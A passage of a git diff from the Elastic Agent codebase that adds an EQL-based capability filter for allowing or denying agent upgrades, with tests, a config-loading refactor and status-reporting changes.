data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-result.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-result.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-result.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/upgrade.go b/x-pack/elastic-agent/pkg/capabilities/upgrade.go new file mode 100644 index 000000000000..8712529c841a --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/upgrade.go @@ -0,0 +1,194 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + "strings" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/eql" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +const ( + versionKey = "version" + sourceURIKey = "source_uri" +) + +// NewUpgradeCapability creates capability filter for upgrade. +// Available variables: +// - version +// - source_uri +func newUpgradesCapability(log *logger.Logger, rd *ruleDefinitions, reporter status.Reporter) (Capability, error) { + if rd == nil { + return &multiUpgradeCapability{caps: []*upgradeCapability{}}, nil + } + + caps := make([]*upgradeCapability, 0, len(rd.Capabilities)) + + for _, r := range rd.Capabilities { + c, err := newUpgradeCapability(log, r, reporter) + if err != nil { + return nil, err + } + + if c != nil { + caps = append(caps, c) + } + } + + return &multiUpgradeCapability{log: log, caps: caps}, nil +} + +func newUpgradeCapability(log *logger.Logger, r ruler, reporter status.Reporter) (*upgradeCapability, error) { + cap, ok := r.(*upgradeCapability) + if !ok { + return nil, nil + } + + cap.Type = strings.ToLower(cap.Type) + if cap.Type != allowKey && cap.Type != denyKey { + return nil, fmt.Errorf("'%s' is not a valid type 'allow' and 'deny' are supported", cap.Type) + } + + // if eql definition is not supported make a global rule + if len(cap.UpgradeEqlDefinition) == 0 { + cap.UpgradeEqlDefinition = "true" + } + + eqlExp, err := eql.New(cap.UpgradeEqlDefinition) + if err != nil { + return nil, err + } + + cap.upgradeEql = eqlExp + cap.log = log + cap.reporter = reporter + return cap, nil +} + +type upgradeCapability struct { + log *logger.Logger + reporter status.Reporter + Name string `json:"name,omitempty" yaml:"name,omitempty"` + Type string `json:"rule" yaml:"rule"` + // UpgradeEql is eql expression defining upgrade + UpgradeEqlDefinition string `json:"upgrade" yaml:"upgrade"` + + upgradeEql *eql.Expression +} + +func (c *upgradeCapability) Rule() string { + return c.Type +} + +func (c *upgradeCapability) name() string { + if c.Name != "" { + return c.Name + } + + t := "A" + if c.Type == denyKey { + t = "D" + } + + // e.g UA(*) or UD(7.*.*) + c.Name = fmt.Sprintf("U%s(%s)", t, c.UpgradeEqlDefinition) + return c.Name +} + +// Apply supports upgrade action or fleetapi upgrade action object. +func (c *upgradeCapability) Apply(upgradeMap map[string]interface{}) (map[string]interface{}, error) { + // if eql is not parsed or defined skip + if c.upgradeEql == nil { + return upgradeMap, nil + } + + // create VarStore out of map + varStore, err := transpiler.NewAST(upgradeMap) + if err != nil { + c.log.Errorf("failed creating a varStore for capability '%s': %v", c.name(), err) + return upgradeMap, nil + } + + isSupported, err := c.upgradeEql.Eval(varStore) + if err != nil { + c.log.Errorf("failed evaluating eql formula for capability '%s': %v", c.name(), err) + return upgradeMap, nil + } + + // if deny switch the logic + if c.Type == denyKey { + isSupported = !isSupported + msg := fmt.Sprintf("upgrade is blocked out due to capability restriction '%s'", c.name()) + c.log.Errorf(msg) + c.reporter.Update(state.Degraded, msg) + } + + if !isSupported { + return upgradeMap, ErrBlocked + } + + return upgradeMap, nil +} + +type multiUpgradeCapability struct { + log *logger.Logger + caps []*upgradeCapability +} + +func (c *multiUpgradeCapability) Apply(in interface{}) (interface{}, error) { + upgradeMap := upgradeObject(in) + if upgradeMap == nil { + c.log.Warnf("expecting map config object but got nil for capability 'multi-outputs'") + // not an upgrade we don't alter origin + return in, nil + } + + for _, cap := range c.caps { + // upgrade does not modify incoming action + _, err := cap.Apply(upgradeMap) + if err != nil { + return in, err + } + } + + return in, nil +} + +func upgradeObject(a interface{}) map[string]interface{} { + resultMap := make(map[string]interface{}) + if ua, ok := a.(upgradeAction); ok { + resultMap[versionKey] = ua.Version() + resultMap[sourceURIKey] = ua.SourceURI() + return resultMap + } + + if ua, ok := a.(*fleetapi.ActionUpgrade); ok { + resultMap[versionKey] = ua.Version + resultMap[sourceURIKey] = ua.SourceURI + return resultMap + } + + if ua, ok := a.(fleetapi.ActionUpgrade); ok { + resultMap[versionKey] = ua.Version + resultMap[sourceURIKey] = ua.SourceURI + return resultMap + } + + return nil +} + +type upgradeAction interface { + // Version to upgrade to. + Version() string + // SourceURI for download. + SourceURI() string +} diff --git a/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go b/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go new file mode 100644 index 000000000000..0dc82ed3507d --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go @@ -0,0 +1,344 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "testing" + + "github.com/stretchr/testify/assert" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +func TestUpgrade(t *testing.T) { + tr := &testReporter{} + l, _ := logger.New("test") + t.Run("invalid rule", func(t *testing.T) { + r := &inputCapability{} + cap, err := newUpgradeCapability(l, r, tr) + assert.NoError(t, err, "no error expected") + assert.Nil(t, cap, "cap should not be created") + }) + + t.Run("empty eql", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "", + }, + }, + } + + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + }) + + t.Run("valid action - version match", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "${version} == '8.0.0'", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "8.0.0"} + outAfter, err := cap.Apply(ta) + + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - deny version match", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "deny", + UpgradeEqlDefinition: "${version} == '8.0.0'", + }, + }, + } + + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "8.0.0"} + outAfter, err := cap.Apply(ta) + + assert.Error(t, err, "should fail") + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - deny version match", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "deny", + UpgradeEqlDefinition: "${version} == '8.*.*'", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "9.0.0"} + outAfter, err := cap.Apply(ta) + + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.NoError(t, err, "should not fail") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - version mismmatch", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "${version} == '7.12.0'", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "8.0.0"} + outAfter, err := cap.Apply(ta) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Error(t, err, "should fail") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - version bug allowed minor mismatch", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.0.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "8.1.0"} + outAfter, err := cap.Apply(ta) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Error(t, err, "should fail") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - version minor allowed major mismatch", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.*.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "7.157.0"} + outAfter, err := cap.Apply(ta) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Error(t, err, "should fail") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - version minor allowed minor upgrade", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.*.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "8.2.0"} + outAfter, err := cap.Apply(ta) + + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.NoError(t, err, "should not fail") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid fleetatpi.action - version match", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.*.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{ + ActionID: "", + ActionType: "", + Version: "8.2.0", + SourceURI: "http://artifacts.elastic.co", + } + outAfter, err := cap.Apply(apiAction) + + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.NoError(t, err, "should not fail") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) + + t.Run("valid fleetatpi.action - version mismmatch", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.*.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := &fleetapi.ActionUpgrade{ + Version: "9.0.0", + SourceURI: "http://artifacts.elastic.co", + } + outAfter, err := cap.Apply(apiAction) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Error(t, err, "should fail") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) + + t.Run("valid fleetatpi.action - version mismmatch", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.*.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{ + Version: "9.0.0", + SourceURI: "http://artifacts.elastic.co", + } + outAfter, err := cap.Apply(apiAction) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Error(t, err, "should fail") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) + + t.Run("valid action - source uri trusted", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "startsWith(${source_uri}, 'https')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{ + Version: "9.0.0", + SourceURI: "https://artifacts.elastic.co", + } + outAfter, err := cap.Apply(apiAction) + + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.NoError(t, err, "should not fail") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) + + t.Run("valid action - source uri untrusted", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "startsWith(${source_uri}, 'https')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{ + Version: "9.0.0", + SourceURI: "http://artifacts.elastic.co", + } + outAfter, err := cap.Apply(apiAction) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) + + t.Run("unknown action", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "startsWith(${source_uri}, 'https')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionPolicyChange{} + outAfter, err := cap.Apply(apiAction) + + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.NoError(t, err, "should not fail") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) +} + +type testUpgradeAction struct { + version string +} + +// Version to upgrade to. +func (a *testUpgradeAction) Version() string { + return a.version +} + +// SourceURI for download. +func (a *testUpgradeAction) SourceURI() string { + return "http://artifacts.elastic.co" +} diff --git a/x-pack/elastic-agent/pkg/config/config.go b/x-pack/elastic-agent/pkg/config/config.go index d2d366e526c7..2de84972a6b6 100644 --- a/x-pack/elastic-agent/pkg/config/config.go +++ b/x-pack/elastic-agent/pkg/config/config.go @@ -8,65 +8,122 @@ import ( "fmt" "io" "io/ioutil" + "os" + + "gopkg.in/yaml.v2" "github.com/elastic/go-ucfg" "github.com/elastic/go-ucfg/cfgutil" - "github.com/elastic/go-ucfg/yaml" ) +// options hold the specified options +type options struct { + skipKeys []string +} + +// Option is an option type that modifies how loading configs work +type Option func(*options) + +// VarSkipKeys prevents variable expansion for these keys. +// +// The provided keys only skip if the keys are top-level keys. +func VarSkipKeys(keys ...string) Option { + return func(opts *options) { + opts.skipKeys = keys + } +} + // DefaultOptions defaults options used to read the configuration -var DefaultOptions = []ucfg.Option{ +var DefaultOptions = []interface{}{ ucfg.PathSep("."), ucfg.ResolveEnv, ucfg.VarExp, + VarSkipKeys("inputs"), } // Config custom type over a ucfg.Config to add new methods on the object. type Config ucfg.Config -// LoadYAML takes YAML configuration and return a concrete Config or any errors. -func LoadYAML(path string, opts ...ucfg.Option) (*Config, error) { - if len(opts) == 0 { - opts = DefaultOptions - } - config, err := yaml.NewConfigWithFile(path, opts...) - if err != nil { - return nil, err - } - return newConfigFrom(config), nil -} - // New creates a new empty config. func New() *Config { return newConfigFrom(ucfg.New()) } // NewConfigFrom takes a interface and read the configuration like it was YAML. -func NewConfigFrom(from interface{}, opts ...ucfg.Option) (*Config, error) { +func NewConfigFrom(from interface{}, opts ...interface{}) (*Config, error) { if len(opts) == 0 { opts = DefaultOptions } - - if str, ok := from.(string); ok { - c, err := yaml.NewConfig([]byte(str), opts...) - return newConfigFrom(c), err + var ucfgOpts []ucfg.Option + var localOpts []Option + for _, o := range opts { + switch ot := o.(type) { + case ucfg.Option: + ucfgOpts = append(ucfgOpts, ot) + case Option: + localOpts = append(localOpts, ot) + default: + return nil, fmt.Errorf("unknown option type %T", o) + } + } + local := &options{} + for _, o := range localOpts { + o(local) } - if in, ok := from.(io.Reader); ok { + var data map[string]interface{} + var err error + if bytes, ok := from.([]byte); ok { + err = yaml.Unmarshal(bytes, &data) + if err != nil { + return nil, err + } + } else if str, ok := from.(string); ok { + err = yaml.Unmarshal([]byte(str), &data) + if err != nil { + return nil, err + } + } else if in, ok := from.(io.Reader); ok { if closer, ok := from.(io.Closer); ok { defer closer.Close() } - - content, err := ioutil.ReadAll(in) + fData, err := ioutil.ReadAll(in) + if err != nil { + return nil, err + } + err = yaml.Unmarshal(fData, &data) if err != nil { return nil, err } - c, err := yaml.NewConfig(content, opts...) + } else if contents, ok := from.(map[string]interface{}); ok { + data = contents + } else { + c, err := ucfg.NewFrom(from, ucfgOpts...) return newConfigFrom(c), err } - c, err := ucfg.NewFrom(from, opts...) - return newConfigFrom(c), err + skippedKeys := map[string]interface{}{} + for _, skip := range local.skipKeys { + val, ok := data[skip] + if ok { + skippedKeys[skip] = val + delete(data, skip) + } + } + cfg, err := ucfg.NewFrom(data, ucfgOpts...) + if err != nil { + return nil, err + } + if len(skippedKeys) > 0 { + err = cfg.Merge(skippedKeys, ucfg.ResolveNOOP) + + // we modified incoming object + // cleanup so skipped keys are not missing + for k, v := range skippedKeys { + data[k] = v + } + } + return newConfigFrom(cfg), err } // MustNewConfigFrom try to create a configuration based on the type passed as arguments and panic @@ -84,8 +141,12 @@ func newConfigFrom(in *ucfg.Config) *Config { } // Unpack unpacks a struct to Config. -func (c *Config) Unpack(to interface{}) error { - return c.access().Unpack(to, DefaultOptions...) +func (c *Config) Unpack(to interface{}, opts ...interface{}) error { + ucfgOpts, err := getUcfgOptions(opts...) + if err != nil { + return err + } + return c.access().Unpack(to, ucfgOpts...) } func (c *Config) access() *ucfg.Config { @@ -93,11 +154,12 @@ func (c *Config) access() *ucfg.Config { } // Merge merges two configuration together. -func (c *Config) Merge(from interface{}, opts ...ucfg.Option) error { - if len(opts) == 0 { - opts = DefaultOptions +func (c *Config) Merge(from interface{}, opts ...interface{}) error { + ucfgOpts, err := getUcfgOptions(opts...) + if err != nil { + return err } - return c.access().Merge(from, opts...) + return c.access().Merge(from, ucfgOpts...) } // ToMapStr takes the config and transform it into a map[string]interface{} @@ -127,18 +189,16 @@ func (c *Config) Enabled() bool { // LoadFile take a path and load the file and return a new configuration. func LoadFile(path string) (*Config, error) { - c, err := yaml.NewConfigWithFile(path, DefaultOptions...) + fp, err := os.Open(path) if err != nil { return nil, err } - - cfg := newConfigFrom(c) - return cfg, err + return NewConfigFrom(fp) } // LoadFiles takes multiples files, load and merge all of them in a single one. func LoadFiles(paths ...string) (*Config, error) { - merger := cfgutil.NewCollector(nil, DefaultOptions...) + merger := cfgutil.NewCollector(nil) for _, path := range paths { cfg, err := LoadFile(path) if err := merger.Add(cfg.access(), err); err != nil { @@ -147,3 +207,22 @@ func LoadFiles(paths ...string) (*Config, error) { } return newConfigFrom(merger.Config()), nil } + +func getUcfgOptions(opts ...interface{}) ([]ucfg.Option, error) { + if len(opts) == 0 { + opts = DefaultOptions + } + var ucfgOpts []ucfg.Option + for _, o := range opts { + switch ot := o.(type) { + case ucfg.Option: + ucfgOpts = append(ucfgOpts, ot) + case Option: + // ignored during unpack + continue + default: + return nil, fmt.Errorf("unknown option type %T", o) + } + } + return ucfgOpts, nil +} diff --git a/x-pack/elastic-agent/pkg/config/config_test.go b/x-pack/elastic-agent/pkg/config/config_test.go index f8b32e97d8e7..105663daccef 100644 --- a/x-pack/elastic-agent/pkg/config/config_test.go +++ b/x-pack/elastic-agent/pkg/config/config_test.go @@ -21,6 +21,44 @@ func TestConfig(t *testing.T) { testLoadFiles(t) } +func TestInputsResolveNOOP(t *testing.T) { + contents := map[string]interface{}{ + "outputs": map[string]interface{}{ + "default": map[string]interface{}{ + "type": "elasticsearch", + "hosts": []interface{}{"127.0.0.1:9200"}, + "username": "elastic", + "password": "changeme", + }, + }, + "inputs": []interface{}{ + map[string]interface{}{ + "type": "logfile", + "streams": []interface{}{ + map[string]interface{}{ + "paths": []interface{}{"/var/log/${host.name}"}, + }, + }, + }, + }, + } + + tmp, err := ioutil.TempDir("", "config") + require.NoError(t, err) + defer os.RemoveAll(tmp) + + cfgPath := filepath.Join(tmp, "config.yml") + dumpToYAML(t, cfgPath, contents) + + cfg, err := LoadFile(cfgPath) + require.NoError(t, err) + + cfgData, err := cfg.ToMapStr() + require.NoError(t, err) + + assert.Equal(t, contents, cfgData) +} + func testToMapStr(t *testing.T) { m := map[string]interface{}{ "hello": map[string]interface{}{ diff --git a/x-pack/elastic-agent/pkg/core/logger/logger.go b/x-pack/elastic-agent/pkg/core/logger/logger.go index 9ae4c78834af..3e70cd88e57b 100644 --- a/x-pack/elastic-agent/pkg/core/logger/logger.go +++ b/x-pack/elastic-agent/pkg/core/logger/logger.go @@ -43,7 +43,7 @@ func NewWithLogpLevel(name string, level logp.Level) (*Logger, error) { return new(name, defaultCfg) } -//NewFromConfig takes the user configuration and generate the right logger. +// NewFromConfig takes the user configuration and generate the right logger. // TODO: Finish implementation, need support on the library that we use. func NewFromConfig(name string, cfg *Config) (*Logger, error) { return new(name, cfg) diff --git a/x-pack/elastic-agent/pkg/core/plugin/process/app.go b/x-pack/elastic-agent/pkg/core/plugin/process/app.go index 1de2feb559fc..4586505db8d3 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/process/app.go +++ b/x-pack/elastic-agent/pkg/core/plugin/process/app.go @@ -85,21 +85,24 @@ func NewApplication( b, _ := tokenbucket.NewTokenBucket(ctx, 3, 3, 1*time.Second) return &Application{ - bgContext: ctx, - id: id, - name: appName, - pipelineID: pipelineID, - logLevel: logLevel, - desc: desc, - srv: srv, - processConfig: cfg.ProcessConfig, - logger: logger, - limiter: b, + bgContext: ctx, + id: id, + name: appName, + pipelineID: pipelineID, + logLevel: logLevel, + desc: desc, + srv: srv, + processConfig: cfg.ProcessConfig, + logger: logger, + limiter: b, + state: state.State{ + Status: state.Stopped, + }, reporter: reporter, monitor: monitor, uid: uid, gid: gid, - statusReporter: statusController.Register(id), + statusReporter: statusController.RegisterApp(id, appName), }, nil } @@ -231,25 +234,6 @@ func (a *Application) waitProc(proc *os.Process) <-chan *os.ProcessState { return resChan } -func (a *Application) setStateFromProto(pstatus proto.StateObserved_Status, msg string, payload map[string]interface{}) { - var status state.Status - switch pstatus { - case proto.StateObserved_STARTING: - status = state.Starting - case proto.StateObserved_CONFIGURING: - status = state.Configuring - case proto.StateObserved_HEALTHY: - status = state.Running - case proto.StateObserved_DEGRADED: - status = state.Degraded - case proto.StateObserved_FAILED: - status = state.Failed - case proto.StateObserved_STOPPING: - status = state.Stopping - } - a.setState(status, msg, payload) -} - func (a *Application) setState(s state.Status, msg string, payload map[string]interface{}) { if a.state.Status != s || a.state.Message != msg || !reflect.DeepEqual(a.state.Payload, payload) { a.state.Status = s @@ -258,15 +242,7 @@ func (a *Application) setState(s state.Status, msg string, payload map[string]in if a.reporter != nil { go a.reporter.OnStateChange(a.id, a.name, a.state) } - - switch s { - case state.Configuring, state.Restarting, state.Starting, state.Stopping, state.Updating: - // no action - case state.Crashed, state.Failed, state.Degraded: - a.statusReporter.Update(status.Degraded) - default: - a.statusReporter.Update(status.Healthy) - } + a.statusReporter.Update(s, msg) } } diff --git a/x-pack/elastic-agent/pkg/core/plugin/process/configure.go b/x-pack/elastic-agent/pkg/core/plugin/process/configure.go index fca2ea0f9c1e..23ebdafbf60d 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/process/configure.go +++ b/x-pack/elastic-agent/pkg/core/plugin/process/configure.go @@ -11,7 +11,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" ) // Configure configures the application with the passed configuration. @@ -20,9 +19,7 @@ func (a *Application) Configure(_ context.Context, config map[string]interface{} if err != nil { // inject App metadata err = errors.New(err, errors.M(errors.MetaKeyAppName, a.name), errors.M(errors.MetaKeyAppName, a.id)) - a.statusReporter.Update(status.Degraded) - } else { - a.statusReporter.Update(status.Healthy) + a.statusReporter.Update(state.Degraded, err.Error()) } }() diff --git a/x-pack/elastic-agent/pkg/core/plugin/process/status.go b/x-pack/elastic-agent/pkg/core/plugin/process/status.go index 473ae9a70c77..21ded6671016 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/process/status.go +++ b/x-pack/elastic-agent/pkg/core/plugin/process/status.go @@ -28,7 +28,7 @@ func (a *Application) OnStatusChange(s *server.ApplicationState, status proto.St return } - a.setStateFromProto(status, msg, payload) + a.setState(state.FromProto(status), msg, payload) if status == proto.StateObserved_FAILED { // ignore when expected state is stopping if s.Expected() == proto.StateExpected_STOPPING { diff --git a/x-pack/elastic-agent/pkg/core/plugin/service/app.go b/x-pack/elastic-agent/pkg/core/plugin/service/app.go index 8e336338f8fd..97196e0307fe 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/service/app.go +++ b/x-pack/elastic-agent/pkg/core/plugin/service/app.go @@ -90,22 +90,25 @@ func NewApplication( b, _ := tokenbucket.NewTokenBucket(ctx, 3, 3, 1*time.Second) return &Application{ - bgContext: ctx, - id: id, - name: appName, - pipelineID: pipelineID, - logLevel: logLevel, - desc: desc, - srv: srv, - processConfig: cfg.ProcessConfig, - logger: logger, - limiter: b, + bgContext: ctx, + id: id, + name: appName, + pipelineID: pipelineID, + logLevel: logLevel, + desc: desc, + srv: srv, + processConfig: cfg.ProcessConfig, + logger: logger, + limiter: b, + state: state.State{ + Status: state.Stopped, + }, reporter: reporter, monitor: monitor, uid: uid, gid: gid, credsPort: credsPort, - statusReporter: statusController.Register(id), + statusReporter: statusController.RegisterApp(id, appName), }, nil } @@ -207,9 +210,7 @@ func (a *Application) Configure(_ context.Context, config map[string]interface{} if err != nil { // inject App metadata err = errors.New(err, errors.M(errors.MetaKeyAppName, a.name), errors.M(errors.MetaKeyAppName, a.id)) - a.statusReporter.Update(status.Degraded) - } else { - a.statusReporter.Update(status.Healthy) + a.statusReporter.Update(state.Degraded, err.Error()) } }() @@ -287,26 +288,7 @@ func (a *Application) OnStatusChange(s *server.ApplicationState, status proto.St return } - a.setStateFromProto(status, msg, payload) -} - -func (a *Application) setStateFromProto(pstatus proto.StateObserved_Status, msg string, payload map[string]interface{}) { - var status state.Status - switch pstatus { - case proto.StateObserved_STARTING: - status = state.Starting - case proto.StateObserved_CONFIGURING: - status = state.Configuring - case proto.StateObserved_HEALTHY: - status = state.Running - case proto.StateObserved_DEGRADED: - status = state.Degraded - case proto.StateObserved_FAILED: - status = state.Failed - case proto.StateObserved_STOPPING: - status = state.Stopping - } - a.setState(status, msg, payload) + a.setState(state.FromProto(status), msg, payload) } func (a *Application) setState(s state.Status, msg string, payload map[string]interface{}) { @@ -317,15 +299,7 @@ func (a *Application) setState(s state.Status, msg string, payload map[string]in if a.reporter != nil { go a.reporter.OnStateChange(a.id, a.name, a.state) } - - switch s { - case state.Configuring, state.Restarting, state.Starting, state.Stopping, state.Updating: - // no action - case state.Crashed, state.Failed, state.Degraded: - a.statusReporter.Update(status.Degraded) - default: - a.statusReporter.Update(status.Healthy) - } + a.statusReporter.Update(s, msg) } } diff --git a/x-pack/elastic-agent/pkg/core/server/server.go b/x-pack/elastic-agent/pkg/core/server/server.go index f0b8ac73d8a5..97517eb6ce6b 100644 --- a/x-pack/elastic-agent/pkg/core/server/server.go +++ b/x-pack/elastic-agent/pkg/core/server/server.go @@ -249,9 +249,13 @@ func (s *Server) Checkin(server proto.ElasticAgent_CheckinServer) error { }() var ok bool + var observedConfigStateIdx uint64 var firstCheckin *proto.StateObserved select { case firstCheckin, ok = <-firstCheckinChan: + if firstCheckin != nil { + observedConfigStateIdx = firstCheckin.ConfigStateIdx + } break case <-time.After(InitialCheckinTimeout): // close connection @@ -281,6 +285,13 @@ func (s *Server) Checkin(server proto.ElasticAgent_CheckinServer) error { s.logger.Debug("check-in stream cannot connect, application is being destroyed; closing connection") return status.Error(codes.Unavailable, "application cannot connect being destroyed") } + + // application is running as a service and counter is already counting + // force config reload + if observedConfigStateIdx > 0 { + appState.expectedConfigIdx = observedConfigStateIdx + 1 + } + checkinDone := make(chan bool) appState.checkinDone = checkinDone appState.checkinLock.Unlock() diff --git a/x-pack/elastic-agent/pkg/core/state/state.go 